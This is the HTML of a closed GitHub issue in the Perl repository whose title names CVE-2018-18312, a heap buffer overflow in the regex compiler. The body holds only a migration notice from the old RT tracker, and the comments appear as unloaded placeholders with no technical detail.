focusable="false" aria-label="Issue" class="octicon octicon-issue-closed Octicon-sc-9kayk9-0 hTWZgt" role="img" viewBox="0 0 16 16" width="16" height="16" fill="currentColor" display="inline-block" overflow="visible" style="vertical-align:text-bottom"><path d="M11.28 6.78a.75.75 0 0 0-1.06-1.06L7.25 8.69 5.78 7.22a.75.75 0 0 0-1.06 1.06l2 2a.75.75 0 0 0 1.06 0l3.5-3.5Z"></path><path d="M16 8A8 8 0 1 1 0 8a8 8 0 0 1 16 0Zm-1.5 0a6.5 6.5 0 1 0-13 0 6.5 6.5 0 0 0 13 0Z"></path></svg>Closed</span></div><!--$--><!--/$--></div></div></div></div><div data-testid="issue-metadata-sticky" class="Box-sc-g0xbh4-0 emuTBT js-notification-shelf-offset-top"><div class="Box-sc-g0xbh4-0 ehzXEi"><div class="Box-sc-g0xbh4-0 iEncmA"><div><span data-testid="header-state" class="StateLabel__StateLabelBase-sc-qthdln-0 jawglP"><svg focusable="false" aria-label="Issue" class="octicon octicon-issue-closed Octicon-sc-9kayk9-0 hTWZgt" role="img" viewBox="0 0 16 16" width="16" height="16" fill="currentColor" display="inline-block" overflow="visible" style="vertical-align:text-bottom"><path d="M11.28 6.78a.75.75 0 0 0-1.06-1.06L7.25 8.69 5.78 7.22a.75.75 0 0 0-1.06 1.06l2 2a.75.75 0 0 0 1.06 0l3.5-3.5Z"></path><path d="M16 8A8 8 0 1 1 0 8a8 8 0 0 1 16 0Zm-1.5 0a6.5 6.5 0 1 0-13 0 6.5 6.5 0 0 0 13 0Z"></path></svg>Closed</span></div><div class="Box-sc-g0xbh4-0 fHWHoy"><div class="Box-sc-g0xbh4-0 htJDeH"><a class="Box-sc-g0xbh4-0 hVVawZ prc-Link-Link-85e08" href="#top"><bdi class="Box-sc-g0xbh4-0 markdown-title" data-testid="issue-title-sticky">[CVE-2018-18312] regcomp: heap-buffer-overflow write / reg_node overrun (perl-5.28.0, 5.26.2)</bdi></a><span class="Box-sc-g0xbh4-0 iQfnYL prc-Text-Text-0ima0">#16649</span></div><div class="Box-sc-g0xbh4-0 jGasrR"><!--$--><!--/$--></div></div><div><div class="Box-sc-g0xbh4-0 cQpCwc"><button data-component="IconButton" type="button" class="prc-Button-ButtonBase-c50BI prc-Button-IconButton-szpyj" data-loading="false" data-no-visuals="true" data-size="medium" data-variant="invisible" aria-describedby=":R77i9b:-loading-announcement" aria-labelledby=":R7i9b:"><svg aria-hidden="true" focusable="false" class="octicon octicon-copy" viewBox="0 0 16 16" width="16" height="16" fill="currentColor" display="inline-block" overflow="visible" style="vertical-align:text-bottom"><path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg></button><span class="CopyToClipboardButton-module__tooltip--Dq1IB prc-TooltipV2-Tooltip-cYMVY" data-direction="s" aria-label="Copy link" aria-hidden="true" id=":R7i9b:">Copy link</span></div></div></div></div></div><div class="Box-sc-g0xbh4-0 gxAvdY"></div><div class="Box-sc-g0xbh4-0 dkqtNN"><div class="Box-sc-g0xbh4-0 hfKjHv"></div></div><div class="Box-sc-g0xbh4-0 ehzXEi"><div class="Box-sc-g0xbh4-0 jonlJW"><div class="Box-sc-g0xbh4-0 bSTcOH"><div data-testid="issue-viewer-issue-container"><div class="Box-sc-g0xbh4-0 gRssIw"><a class="Avatar-module__avatarLink--S36bm Avatar-module__avatarOuter--MZJZH prc-Link-Link-85e08" href="/p5pRT" data-hovercard-url="/users/p5pRT/hovercard" aria-label="@p5pRT's profile"><img data-component="Avatar" class="Avatar-module__issueViewerAvatar--grA_h prc-Avatar-Avatar-ZRS-m" alt="@p5pRT" width="40" height="40" style="--avatarSize-regular:40px" src="https://avatars.githubusercontent.com/u/51798018?u=c0c9dec90db4d6102e88553f891e56b4bb45370e&v=4&size=80" data-testid="github-avatar"/></a><div data-testid="issue-body" class="Box-sc-g0xbh4-0 bDlPR react-issue-body" data-hpc="true"><h2 class="sr-only">Description</h2><div class="Box-sc-g0xbh4-0 crMLA-D"><div class="Box-sc-g0xbh4-0 bjwYme"><div class="Box-sc-g0xbh4-0 jSpDiO"><div class="Box-sc-g0xbh4-0 fnEhwD ActivityHeader-module__activityHeader--Flalv"><div class="Box-sc-g0xbh4-0 iKiGfw Avatar-module__avatarInner--rVuJD"><a class="Avatar-module__avatarLink--S36bm prc-Link-Link-85e08" href="/p5pRT" data-hovercard-url="/users/p5pRT/hovercard" aria-label="@p5pRT's profile"><img data-component="Avatar" class="prc-Avatar-Avatar-ZRS-m" alt="@p5pRT" width="24" height="24" style="--avatarSize-regular:24px" src="https://avatars.githubusercontent.com/u/51798018?u=c0c9dec90db4d6102e88553f891e56b4bb45370e&v=4&size=48" data-testid="github-avatar"/></a></div><div class="Box-sc-g0xbh4-0 koxHLL ActivityHeader-module__narrowViewportWrapper--Hjl75"><div class="Box-sc-g0xbh4-0 dqmClk"><a class="Box-sc-g0xbh4-0 cRhwji prc-Link-Link-85e08" href="https://github.com/p5pRT" data-hovercard-url="/users/p5pRT/hovercard" data-testid="issue-body-header-author">p5pRT</a></div><div class="Box-sc-g0xbh4-0 bJQcYY ActivityHeader-module__footer--FVHp7"><span>opened </span><a class="Box-sc-g0xbh4-0 bjFvWy prc-Link-Link-85e08" href="https://github.com/Perl/perl5/issues/16649#issue-509394960" data-testid="issue-body-header-link"><relative-time sx="[object Object]" class="sc-aXZVg gcWyXp">on <!-- -->Aug 4, 2018</relative-time></a></div></div><div class="Box-sc-g0xbh4-0 kgTqOk ActivityHeader-module__narrowViewportWrapper--Hjl75"><div class="Box-sc-g0xbh4-0 izrTon ActivityHeader-module__edits--LwHTE"></div><div class="Box-sc-g0xbh4-0 kpoUe"><div class="Box-sc-g0xbh4-0 ezcJRX"></div><div class="Box-sc-g0xbh4-0 dnyPuu"><button data-component="IconButton" type="button" aria-haspopup="true" aria-expanded="false" tabindex="0" class="prc-Button-ButtonBase-c50BI prc-Button-IconButton-szpyj" data-loading="false" data-no-visuals="true" data-size="small" data-variant="invisible" aria-describedby=":R15bd5db:-loading-announcement" aria-labelledby=":Rv5bd5db:" id=":R15bd5db:"><svg aria-hidden="true" focusable="false" class="octicon octicon-kebab-horizontal" viewBox="0 0 16 16" width="16" height="16" fill="currentColor" display="inline-block" overflow="visible" style="vertical-align:text-bottom"><path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg></button><span class="prc-TooltipV2-Tooltip-cYMVY" data-direction="s" aria-hidden="true" id=":Rv5bd5db:">Issue body actions</span></div></div></div></div></div><div class="IssueBodyViewer-module__IssueBody--MXyFt"><div data-testid="markdown-body" data-team-hovercards-enabled="true" class="markdown-body" data-turbolinks="false"><div class="Box-sc-g0xbh4-0 markdown-body NewMarkdownViewer-module__safe-html-box--cRsz0"><p dir="auto">Migrated from <a href="https://rt-archive.perl.org/perl5/Ticket/Display.html?id=133423" rel="nofollow">rt.perl.org#133423</a> (status was 'resolved')</p> <p dir="auto">Searchable as RT133423$</p></div></div><div class="IssueBodyViewer-module__IssueBodyTaskList--r4XEH"><!--$--><div role="toolbar" aria-label="Reactions" class="d-flex gap-1 flex-wrap"></div><!--/$--></div></div></div></div></div></div></div><div data-testid="issue-viewer-comments-container" class="react-comments-container"><div class="Box-sc-g0xbh4-0 fDhSWy"><!--$!--><template></template><div class="issue-timeline-loading-module__delaySkeletonLoad--qiw2o" data-testid="issue-timeline-loading"><div><div class="Box-sc-g0xbh4-0 jZGZCQ"><div height="40px" width="40px" class="Box-sc-g0xbh4-0 LoadingSkeleton-sc-695d630a-0 kqdiwS qthD"></div><div class="Box-sc-g0xbh4-0 bcnvkr"><div class="Box-sc-g0xbh4-0 fwWvvw"><div class="Box-sc-g0xbh4-0 kRydKY"></div><div class="Box-sc-g0xbh4-0 fMCkUS"></div></div><div data-testid="comment-skeleton" class="Box-sc-g0xbh4-0 jTVDGA"><div class="Box-sc-g0xbh4-0 ioNKhs"><div height="sm" width="150px" class="Box-sc-g0xbh4-0 LoadingSkeleton-sc-695d630a-0 jKxfJf eyUUZI"></div></div><div class="Box-sc-g0xbh4-0 ieSmsH"><div height="sm" width="random" class="Box-sc-g0xbh4-0 LoadingSkeleton-sc-695d630a-0 hpcToU jjSEMS"></div><div height="sm" width="random" class="Box-sc-g0xbh4-0 LoadingSkeleton-sc-695d630a-0 hpcToU itUJci"></div><div height="sm" width="random" class="Box-sc-g0xbh4-0 LoadingSkeleton-sc-695d630a-0 hpcToU cShPCj"></div><div height="sm" width="random" class="Box-sc-g0xbh4-0 LoadingSkeleton-sc-695d630a-0 hpcToU duUilQ"></div></div></div></div></div></div><div><div class="Box-sc-g0xbh4-0 jZGZCQ"><div height="40px" width="40px" class="Box-sc-g0xbh4-0 LoadingSkeleton-sc-695d630a-0 kqdiwS qthD"></div><div class="Box-sc-g0xbh4-0 bcnvkr"><div class="Box-sc-g0xbh4-0 fwWvvw"><div class="Box-sc-g0xbh4-0 kRydKY"></div><div class="Box-sc-g0xbh4-0 fMCkUS"></div></div><div data-testid="comment-skeleton" class="Box-sc-g0xbh4-0 jTVDGA"><div class="Box-sc-g0xbh4-0 ioNKhs"><div height="sm" width="150px" class="Box-sc-g0xbh4-0 LoadingSkeleton-sc-695d630a-0 jKxfJf eyUUZI"></div></div><div class="Box-sc-g0xbh4-0 ieSmsH"><div height="sm" width="random" class="Box-sc-g0xbh4-0 LoadingSkeleton-sc-695d630a-0 hpcToU izpEpw"></div><div height="sm" width="random" class="Box-sc-g0xbh4-0 LoadingSkeleton-sc-695d630a-0 hpcToU jmMBqY"></div></div></div></div></div></div><div><div class="Box-sc-g0xbh4-0 jZGZCQ"><div height="40px" width="40px" class="Box-sc-g0xbh4-0 LoadingSkeleton-sc-695d630a-0 kqdiwS qthD"></div><div class="Box-sc-g0xbh4-0 bcnvkr"><div class="Box-sc-g0xbh4-0 fwWvvw"><div class="Box-sc-g0xbh4-0 kRydKY"></div><div class="Box-sc-g0xbh4-0 fMCkUS"></div></div><div data-testid="comment-skeleton" class="Box-sc-g0xbh4-0 jTVDGA"><div class="Box-sc-g0xbh4-0 ioNKhs"><div height="sm" width="150px" class="Box-sc-g0xbh4-0 LoadingSkeleton-sc-695d630a-0 jKxfJf eyUUZI"></div></div><div class="Box-sc-g0xbh4-0 ieSmsH"><div height="sm" width="random" class="Box-sc-g0xbh4-0 LoadingSkeleton-sc-695d630a-0 hpcToU izxDlu"></div><div height="sm" width="random" class="Box-sc-g0xbh4-0 LoadingSkeleton-sc-695d630a-0 hpcToU kxHHCJ"></div><div height="sm" width="random" class="Box-sc-g0xbh4-0 LoadingSkeleton-sc-695d630a-0 hpcToU duUilQ"></div><div height="sm" width="random" class="Box-sc-g0xbh4-0 LoadingSkeleton-sc-695d630a-0 hpcToU izxDlu"></div></div></div></div></div></div><div><div class="Box-sc-g0xbh4-0 jZGZCQ"><div height="40px" width="40px" class="Box-sc-g0xbh4-0 LoadingSkeleton-sc-695d630a-0 kqdiwS qthD"></div><div class="Box-sc-g0xbh4-0 bcnvkr"><div class="Box-sc-g0xbh4-0 fwWvvw"><div class="Box-sc-g0xbh4-0 kRydKY"></div><div class="Box-sc-g0xbh4-0 fMCkUS"></div></div><div data-testid="comment-skeleton" class="Box-sc-g0xbh4-0 jTVDGA"><div class="Box-sc-g0xbh4-0 ioNKhs"><div height="sm" width="150px" class="Box-sc-g0xbh4-0 LoadingSkeleton-sc-695d630a-0 jKxfJf eyUUZI"></div></div><div class="Box-sc-g0xbh4-0 ieSmsH"><div height="sm" width="random" class="Box-sc-g0xbh4-0 LoadingSkeleton-sc-695d630a-0 hpcToU kzTRZv"></div><div height="sm" width="random" class="Box-sc-g0xbh4-0 LoadingSkeleton-sc-695d630a-0 hpcToU cGKgXT"></div><div height="sm" width="random" class="Box-sc-g0xbh4-0 LoadingSkeleton-sc-695d630a-0 hpcToU jhGuqg"></div></div></div></div></div></div><div><div class="Box-sc-g0xbh4-0 jZGZCQ"><div height="40px" width="40px" class="Box-sc-g0xbh4-0 LoadingSkeleton-sc-695d630a-0 kqdiwS qthD"></div><div class="Box-sc-g0xbh4-0 bcnvkr"><div class="Box-sc-g0xbh4-0 fwWvvw"><div class="Box-sc-g0xbh4-0 kRydKY"></div><div class="Box-sc-g0xbh4-0 fMCkUS"></div></div><div data-testid="comment-skeleton" class="Box-sc-g0xbh4-0 jTVDGA"><div class="Box-sc-g0xbh4-0 ioNKhs"><div height="sm" width="150px" class="Box-sc-g0xbh4-0 LoadingSkeleton-sc-695d630a-0 jKxfJf eyUUZI"></div></div><div class="Box-sc-g0xbh4-0 ieSmsH"><div height="sm" width="random" class="Box-sc-g0xbh4-0 LoadingSkeleton-sc-695d630a-0 hpcToU iXfpGx"></div><div height="sm" width="random" class="Box-sc-g0xbh4-0 LoadingSkeleton-sc-695d630a-0 hpcToU likIaf"></div><div height="sm" width="random" class="Box-sc-g0xbh4-0 LoadingSkeleton-sc-695d630a-0 hpcToU iFsrGy"></div><div height="sm" width="random" class="Box-sc-g0xbh4-0 LoadingSkeleton-sc-695d630a-0 hpcToU jiLAah"></div></div></div></div></div></div></div><!--/$--></div></div></div><div data-testid="issue-viewer-metadata-container" class="Box-sc-g0xbh4-0 kpqASb"><div class="IssueViewer-module__issueViewerMetadataPane--Q1n1b" data-testid="issue-viewer-metadata-pane"><h2 class="IssueViewer-module__metadataHeader--ZtOKL prc-Heading-Heading-6CmGO">Metadata</h2><h2 class="IssueViewer-module__largeScreenMetadataHeader--YW31U sr-only prc-Heading-Heading-6CmGO">Metadata</h2><div data-testid="sidebar-section" class="Box-sc-g0xbh4-0 kDreLw"><div class="Box-sc-g0xbh4-0 hfKjHv"><div class="Box-sc-g0xbh4-0 bwxuvd"><h3 class="Box-sc-g0xbh4-0 jVkRst prc-Heading-Heading-6CmGO">Assignees</h3></div><span class="Box-sc-g0xbh4-0 dCKzSy prc-Text-Text-0ima0">No one assigned</span><div class="Box-sc-g0xbh4-0 flpEwB"><ul class="List__ListBox-sc-1x7olzq-0 eoXvfR prc-ActionList-ActionList-X4RiC" data-dividers="false" data-variant="full"></ul></div></div></div><div data-testid="sidebar-section" class="Box-sc-g0xbh4-0 kDreLw"><div class="Box-sc-g0xbh4-0 hfKjHv"><div class="Box-sc-g0xbh4-0 bwxuvd"><h3 class="Box-sc-g0xbh4-0 jVkRst prc-Heading-Heading-6CmGO">Labels</h3></div><span class="Box-sc-g0xbh4-0 dCKzSy prc-Text-Text-0ima0">No labels</span><div class="Box-sc-g0xbh4-0 flpEwB"><div tabindex="-1" data-testid="issue-labels" class="Box-sc-g0xbh4-0 foDGRB">No labels</div></div></div></div><div data-testid="sidebar-section" class="Box-sc-g0xbh4-0 kDreLw"><div class="Box-sc-g0xbh4-0 hfKjHv"><div class="Box-sc-g0xbh4-0 bwxuvd"><h3 class="Box-sc-g0xbh4-0 jVkRst prc-Heading-Heading-6CmGO">Type</h3></div><span class="Box-sc-g0xbh4-0 dCKzSy prc-Text-Text-0ima0">No type</span><div class="Box-sc-g0xbh4-0 flpEwB"><div class="Box-sc-g0xbh4-0 gMMrYE"><div class="Box-sc-g0xbh4-0 flpEwB"></div></div></div></div></div><!--$--><div data-testid="sidebar-projects-section" class="Box-sc-g0xbh4-0 kDreLw"><div class="Box-sc-g0xbh4-0 hfKjHv"><div class="Box-sc-g0xbh4-0 bwxuvd"><h3 class="Box-sc-g0xbh4-0 jVkRst prc-Heading-Heading-6CmGO">Projects</h3></div><span class="Box-sc-g0xbh4-0 dCKzSy prc-Text-Text-0ima0">No projects</span><div class="Box-sc-g0xbh4-0 flpEwB"><div class="Box-sc-g0xbh4-0 fBPJxs"></div></div></div></div><!--/$--><div data-testid="sidebar-section" class="Box-sc-g0xbh4-0 kDreLw"><div class="Box-sc-g0xbh4-0 hfKjHv"><div class="Box-sc-g0xbh4-0 bwxuvd"><h3 class="Box-sc-g0xbh4-0 jVkRst prc-Heading-Heading-6CmGO">Milestone</h3></div><span class="Box-sc-g0xbh4-0 dCKzSy prc-Text-Text-0ima0">No milestone</span><div class="Box-sc-g0xbh4-0 flpEwB"><ul class="prc-ActionList-ActionList-X4RiC" data-dividers="false" data-variant="full"><div class="Box-sc-g0xbh4-0 flpEwB"></div></ul></div></div></div><!--$--><div data-testid="sidebar-section" class="Box-sc-g0xbh4-0 kDreLw"><div class="Box-sc-g0xbh4-0 hfKjHv"><div class="Box-sc-g0xbh4-0 bwxuvd"><h3 class="Box-sc-g0xbh4-0 jVkRst prc-Heading-Heading-6CmGO">Relationships</h3></div><span class="Box-sc-g0xbh4-0 dCKzSy prc-Text-Text-0ima0">None yet</span><div class="Box-sc-g0xbh4-0 flpEwB"></div></div></div><div data-testid="sidebar-section" class="Box-sc-g0xbh4-0 kDreLw"><div class="Box-sc-g0xbh4-0 hfKjHv"><div class="Box-sc-g0xbh4-0 bwxuvd"><h3 class="Box-sc-g0xbh4-0 jVkRst prc-Heading-Heading-6CmGO">Development</h3></div><span class="Box-sc-g0xbh4-0 dCKzSy prc-Text-Text-0ima0">No branches or pull requests</span><div class="Box-sc-g0xbh4-0 flpEwB"></div></div></div><!--/$--><h2 class="sr-only prc-Heading-Heading-6CmGO">Issue actions</h2><ul class="prc-ActionList-ActionList-X4RiC OptionsSection-module__ActionListOverrides--M6klF" data-dividers="false" data-variant="full"></ul></div></div></div></div><!--/$--></div><!--/$--></div></div><!--/$--><!--/$--><script type="application/json" id="__PRIMER_DATA_:R0:__">{"resolvedServerColorMode":"day"}</script></div> </react-app> </turbo-frame> </div> </turbo-frame> </main> </div> </div> <footer class="footer pt-8 pb-6 f6 color-fg-muted p-responsive" role="contentinfo" > <h2 class='sr-only'>Footer</h2> <div class="d-flex flex-justify-center flex-items-center flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap"> <div class="d-flex flex-items-center flex-shrink-0 mx-2"> <a aria-label="Homepage" title="GitHub" class="footer-octicon mr-2" href="https://github.com"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M12 1C5.9225 1 1 5.9225 1 12C1 16.8675 4.14875 20.9787 8.52125 22.4362C9.07125 22.5325 9.2775 22.2025 9.2775 21.9137C9.2775 21.6525 9.26375 20.7862 9.26375 19.865C6.5 20.3737 5.785 19.1912 5.565 18.5725C5.44125 18.2562 4.905 17.28 4.4375 17.0187C4.0525 16.8125 3.5025 16.3037 4.42375 16.29C5.29 16.2762 5.90875 17.0875 6.115 17.4175C7.105 19.0812 8.68625 18.6137 9.31875 18.325C9.415 17.61 9.70375 17.1287 10.02 16.8537C7.5725 16.5787 5.015 15.63 5.015 11.4225C5.015 10.2262 5.44125 9.23625 6.1425 8.46625C6.0325 8.19125 5.6475 7.06375 6.2525 5.55125C6.2525 5.55125 7.17375 5.2625 9.2775 6.67875C10.1575 6.43125 11.0925 6.3075 12.0275 6.3075C12.9625 6.3075 13.8975 6.43125 14.7775 6.67875C16.8813 5.24875 17.8025 5.55125 17.8025 5.55125C18.4075 7.06375 18.0225 8.19125 17.9125 8.46625C18.6138 9.23625 19.04 10.2125 19.04 11.4225C19.04 15.6437 16.4688 16.5787 14.0213 16.8537C14.42 17.1975 14.7638 17.8575 14.7638 18.8887C14.7638 20.36 14.75 21.5425 14.75 21.9137C14.75 22.2025 14.9563 22.5462 15.5063 22.4362C19.8513 20.9787 23 16.8537 23 12C23 5.9225 18.0775 1 12 1Z"></path> </svg> </a> <span> © 2025 GitHub, Inc. </span> </div> <nav aria-label="Footer"> <h3 class="sr-only" id="sr-footer-heading">Footer navigation</h3> <ul class="list-style-none d-flex flex-justify-center flex-wrap mb-2 mb-lg-0" aria-labelledby="sr-footer-heading"> <li class="mx-2"> <a data-analytics-event="{"category":"Footer","action":"go to Terms","label":"text:terms"}" href="https://docs.github.com/site-policy/github-terms/github-terms-of-service" data-view-component="true" class="Link--secondary Link">Terms</a> </li> <li class="mx-2"> <a data-analytics-event="{"category":"Footer","action":"go to privacy","label":"text:privacy"}" href="https://docs.github.com/site-policy/privacy-policies/github-privacy-statement" data-view-component="true" class="Link--secondary Link">Privacy</a> </li> <li class="mx-2"> <a data-analytics-event="{"category":"Footer","action":"go to security","label":"text:security"}" href="https://github.com/security" data-view-component="true" class="Link--secondary Link">Security</a> </li> <li class="mx-2"> <a data-analytics-event="{"category":"Footer","action":"go to status","label":"text:status"}" href="https://www.githubstatus.com/" data-view-component="true" class="Link--secondary Link">Status</a> </li> <li class="mx-2"> <a data-analytics-event="{"category":"Footer","action":"go to docs","label":"text:docs"}" href="https://docs.github.com/" data-view-component="true" class="Link--secondary Link">Docs</a> </li> <li class="mx-2"> <a data-analytics-event="{"category":"Footer","action":"go to contact","label":"text:contact"}" href="https://support.github.com?tags=dotcom-footer" data-view-component="true" class="Link--secondary Link">Contact</a> </li> <li class="mx-2" > <cookie-consent-link> <button type="button" class="Link--secondary underline-on-hover border-0 p-0 color-bg-transparent" data-action="click:cookie-consent-link#showConsentManagement" data-analytics-event="{"location":"footer","action":"cookies","context":"subfooter","tag":"link","label":"cookies_link_subfooter_footer"}" > Manage cookies </button> </cookie-consent-link> </li> <li class="mx-2"> <cookie-consent-link> <button type="button" class="Link--secondary underline-on-hover border-0 p-0 color-bg-transparent" data-action="click:cookie-consent-link#showConsentManagement" data-analytics-event="{"location":"footer","action":"dont_share_info","context":"subfooter","tag":"link","label":"dont_share_info_link_subfooter_footer"}" > Do not share my personal information </button> </cookie-consent-link> </li> </ul> </nav> </div> </footer> <ghcc-consent id="ghcc" class="position-fixed bottom-0 left-0" style="z-index: 999999" data-initial-cookie-consent-allowed="" data-cookie-consent-required="false"></ghcc-consent> <div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path> </svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path> </svg> </button> You can’t perform that action at this time. </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path> </svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details> </template> <div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div> </div> <template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path> </svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none m-2"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path> </svg> </clipboard-copy> </div> </template> <template id="snippet-clipboard-copy-button-unpositioned"> <div class="zeroclipboard-container"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn btn-invisible js-clipboard-copy m-2 p-0 d-flex flex-justify-center flex-items-center" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path> </svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path> </svg> </clipboard-copy> </div> </template> </div> <div id="js-global-screen-reader-notice" class="sr-only mt-n1" aria-live="polite" aria-atomic="true" ></div> <div id="js-global-screen-reader-notice-assertive" class="sr-only mt-n1" aria-live="assertive" aria-atomic="true"></div> </body> </html>